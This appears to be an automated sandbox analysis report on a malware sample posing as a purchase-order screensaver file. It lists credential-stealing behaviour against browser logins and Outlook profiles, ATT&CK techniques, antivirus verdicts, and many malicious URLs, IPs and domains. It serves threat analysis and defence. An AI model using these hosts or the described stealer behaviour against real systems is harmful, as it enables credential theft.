Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Queries volume information: C:\Users\user\AppData\Roaming\hVVSnrrP.exe VolumeInformation
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Microsofts.exe VolumeInformation
Source: C:\Windows\System32\alg.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\ehome\ehrecvr.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\ehome\ehsched.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\ieetwcollector.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msdtc.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\perfhost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\Locator.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\snmptrap.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
                  Source: C:\Windows\System32\vds.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\wbengine.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO#_1100015533.scr PID: 3632, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Microsofts.exe PID: 3800, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
Source: Yara match | File source: 00000008.00000002.393446054.0000000002950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.393694590.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.394485732.0000000003FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.393542161.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO#_1100015533.scr PID: 3632, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Microsofts.exe PID: 3800, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Directory queried: C:\Program Files (x86)\Windows Mail\en-US *
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Directory queried: C:\Program Files (x86)\Windows Mail\en-US NULL
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: Yara match | File source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.643206935.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO#_1100015533.scr PID: 3632, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Microsofts.exe PID: 3800, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO#_1100015533.scr PID: 3632, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Microsofts.exe PID: 3800, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
Source: Yara match | File source: 00000008.00000002.393446054.0000000002950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.393694590.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.394485732.0000000003FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.393542161.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO#_1100015533.scr PID: 3632, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Microsofts.exe PID: 3800, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
MITRE ATT&CK Matrix (one line per tactic; a technique carrying a leading number was matched by this sample's signatures, the number being the report's match badge):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 1 Command and Scripting Interpreter; 11 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 LSASS Driver; 1 DLL Side-Loading; 1 Windows Service; 11 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 LSASS Driver; 1 DLL Side-Loading; 1 Windows Service; 111 Process Injection; 11 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 11 Disable or Modify Tools; 1 Obfuscated Files or Information; 1 Install Root Certificate; 2 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 222 Masquerading; 1 Modify Registry; 31 Virtualization/Sandbox Evasion; 111 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 File and Directory Discovery; 13 System Information Discovery; 2 Security Software Discovery; 1 Query Registry; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery; Network Service Discovery
Lateral Movement: 1 Taint Shared Content; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 1 Data from Local System; 2 Email Collection; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 3 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 15 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
[Behavior graph (image not reproduced here). Behavior Graph ID: 1591772; Sample: PO#_1100015533.scr; Startdate: 15/01/2025; Architecture: WINDOWS; Score: 100]

Source | Detection | Scanner | Label | Link
PO#_1100015533.scr | 32% | Virustotal | | Browse
PO#_1100015533.scr | 21% | ReversingLabs
PO#_1100015533.scr | 100% | Avira | HEUR/AGEN.1311126
PO#_1100015533.scr | 100% | Joe Sandbox ML

Source | Detection | Scanner | Label | Link
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | 100% | Avira | W32/Infector.Gen
C:\Users\user\AppData\Roaming\hVVSnrrP.exe | 100% | Avira | HEUR/AGEN.1311126
C:\Windows\System32\SearchIndexer.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | 100% | Avira | W32/Infector.Gen
C:\Users\user\AppData\Local\Temp\Microsofts.exe | 100% | Avira | TR/ATRAPS.Gen
C:\Windows\System32\VSSVC.exe | 100% | Avira | W32/Infector.Gen
C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | 100% | Avira | TR/Dropper.Gen
C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\FXSSVC.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files\Windows Media Player\wmpnetwk.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\Locator.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\SysWOW64\perfhost.exe | 100% | Avira | W32/Infector.Gen
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | 100% | Avira | TR/Dropper.Gen
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Roaming\hVVSnrrP.exe | 100% | Joe Sandbox ML
C:\Windows\System32\SearchIndexer.exe | 100% | Joe Sandbox ML
C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Microsofts.exe | 100% | Joe Sandbox ML
C:\Windows\System32\VSSVC.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe | 100% | Joe Sandbox ML
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | 100% | Joe Sandbox ML
C:\Windows\System32\FXSSVC.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML
C:\Program Files\Windows Media Player\wmpnetwk.exe | 100% | Joe Sandbox ML
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe | 100% | Joe Sandbox ML
C:\Windows\System32\Locator.exe | 100% | Joe Sandbox ML
C:\Windows\SysWOW64\perfhost.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | 100% | Joe Sandbox ML
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | 100% | Joe Sandbox ML
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | 100% | Joe Sandbox ML
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Microsofts.exe | 91% | ReversingLabs | ByteCode-MSIL.Spyware.Snakekeylogger
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | 92% | ReversingLabs | ByteCode-MSIL.Infostealer.ClipBanker
C:\Users\user\AppData\Roaming\hVVSnrrP.exe | 21% | ReversingLabs

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
http://reallyfreegeoip.orgX | 0% | Avira URL Cloud | safe
http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640 | 100% | Avira URL Cloud | malware
http://72.52.178.23/ayokafkcxduc | 0% | Avira URL Cloud | safe
http://54.244.188.177/rmrhacpx | 100% | Avira URL Cloud | malware
http://ww7.przvgke.biz/ | 100% | Avira URL Cloud | malware
http://.exe | 0% | Avira URL Cloud | safe
https://trkpcna.net/track. | 0% | Avira URL Cloud | safe
http://ww7.przvgke.biz/bhikwfegywkkepu?usid=20&utid=14164930459 | 100% | Avira URL Cloud | malware
http://ww12.fwiwk.biz/qdy?usid=20&utid=14164936400 | 100% | Avira URL Cloud | phishing
http://54.244.188.177/crsFLLcp | 100% | Avira URL Cloud | malware
http://54.244.188.177/rmrhacpxL | 100% | Avira URL Cloud | malware
http://82.112.184.197/yhhdkvr | 0% | Avira URL Cloud | safe
http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640Cb | 100% | Avira URL Cloud | malware
http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640LocationETagAuthentication-InfoAgeAccep | 100% | Avira URL Cloud | malware
http://checkip.dyndns.comX | 0% | Avira URL Cloud | safe
http://ww12.fwiwk.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjl8fHx8fHw2Nzg3YTJmYjY5OW | 100% | Avira URL Cloud | phishing
http://54.244.188.177/crs | 100% | Avira URL Cloud | malware
http://ww7.fwiwk.biz/lderrm?usid=20&utid=14164936613 | 100% | Avira URL Cloud | phishing
http://82.112.184.197/savrhhv | 0% | Avira URL Cloud | safe
http://checkip.dyndns.orgX | 0% | Avira URL Cloud | safe
http://35.164.78.200/ | 0% | Avira URL Cloud | safe
                                                                                        ww7.fwiwk.biz
                                                                                        unknown
                                                                                        unknowntrue
                                                                                          unknown
                                                                                          zlenh.biz
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            high
                                                                                            ww12.przvgke.biz
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              high
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
http://myups.biz/d | false | | high
http://yunalwv.biz/egbl | false | | high
http://cvgrf.biz/mlvmnwk | false | | high
http://przvgke.biz/ayokafkcxduc | false | | high
http://checkip.dyndns.org/ | false | | high
http://nqwjmb.biz/uihfupcxt | false | | high
http://dwrqljrr.biz/bcafsfattyjokwi | false | | high
http://npukfztj.biz/jy | false | | high
http://knjghuig.biz/mspai | false | | high
http://npukfztj.biz/ka | false | | high
http://qaynky.biz/ekhmfom | false | | high
http://pywolwnvd.biz/xvuqxulkih | false | | high
http://jpskm.biz/njuvyxgvhb | false | | high
http://vjaxhpbji.biz/yhhdkvr | false | | high
http://pywolwnvd.biz/crs | false | | high
http://przvgke.biz/tbjnflaqienlofab | false | | high
http://oshhkdluh.biz/nqxton | false | | high
http://ssbzmoy.biz/xatwldmnpl | false | | high
http://yunalwv.biz/vattrqg | false | | high
http://cvgrf.biz/agmftfyaknf | false | | high
http://lpuegx.biz/kieltrnsm | false | | high
http://lpuegx.biz/tehaooq | false | | high
http://myups.biz/cufth | false | | high
http://knjghuig.biz/dcbbaoyhlxdmix | false | | high
http://ssbzmoy.biz/bjyjakehonafotkd | false | | high
http://lpuegx.biz/m | false | | high
http://vjaxhpbji.biz/qpqnetyp | false | | high
http://ytctnunms.biz/qgbipxbu | false | | high
http://przvgke.biz/of | false | | high
http://gytujflc.biz/fmxntfwxlcjyow | false | | high
http://lrxdmhrr.biz/rmrhacpx | false | | high
http://ssbzmoy.biz/rgs | false | | high
http://vjaxhpbji.biz/savrhhv | false | | high
http://saytjshyf.biz/kskvulsy | false | | high
http://cvgrf.biz/euichtddo | false | | high
http://przvgke.biz/bhikwfegywkkepu | false | | high
http://vjaxhpbji.biz/fekpygna | false | | high
http://gytujflc.biz/dwwujsrodteum | false | | high
http://pywolwnvd.biz/j | false | | high
http://lpuegx.biz/mgjwfjfoigllfjqd | false | | high
http://fwiwk.biz/qdy | false | | high
http://vcddkls.biz/gsqrd | false | | high
http://fwiwk.biz/lderrm | false | | high
http://bumxkqgxu.biz/tgbpchottuabpqdq | false | | high
http://xlfhhhm.biz/wuwlkmskpl | false | | high
http://przvgke.biz/wqgsdflawiqut | false | | high
http://npukfztj.biz/uxiijwub | false | | high
http://przvgke.biz/vpav | false | | high
http://ifsaia.biz/uknkrwvskelclnbw | false | | high
http://tbjrpv.biz/wua | false | | high
http://pywolwnvd.biz/bqjjhsnkosjso | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://reallyfreegeoip.orgX | Microsofts.exe, 0000000E.00000002.643206935.000000000272D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://trkpcna.net/track. | armsvc.exe, 0000000B.00000003.599139658.0000000001E40000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189X | Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.diginotar.nl/cps/pkioverheid0 | Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640 | hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp; hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp; hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.google.com | armsvc.exe, 0000000B.00000003.602188957.00000000026D0000.00000004.00000020.00020000.00000000.sdmp; armsvc.exe, 0000000B.00000003.393870874.0000000002470000.00000004.00000020.00020000.00000000.sdmp; armsvc.exe, 0000000B.00000003.391699512.0000000001F00000.00000004.00001000.00020000.00000000.sdmp; armsvc.exe, 0000000B.00000003.393845500.0000000001EE0000.00000004.00001000.00020000.00000000.sdmp; armsvc.exe, 0000000B.00000002.639468285.00000000006CB000.00000004.00000020.00020000.00000000.sdmp; armsvc.exe, 0000000B.00000003.392632097.00000000023E0000.00000004.00000020.00020000.00000000.sdmp; hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ww7.przvgke.biz/bhikwfegywkkepu?usid=20&utid=14164930459 | hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ww12.fwiwk.biz/qdy?usid=20&utid=14164936400 | armsvc.exe, 0000000B.00000002.639468285.00000000006CB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://checkip.dyndns.org/q | PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp; Microsofts.exe, 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp; Microsofts.exe.8.dr | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/X | Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://72.52.178.23/ayokafkcxduc | hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
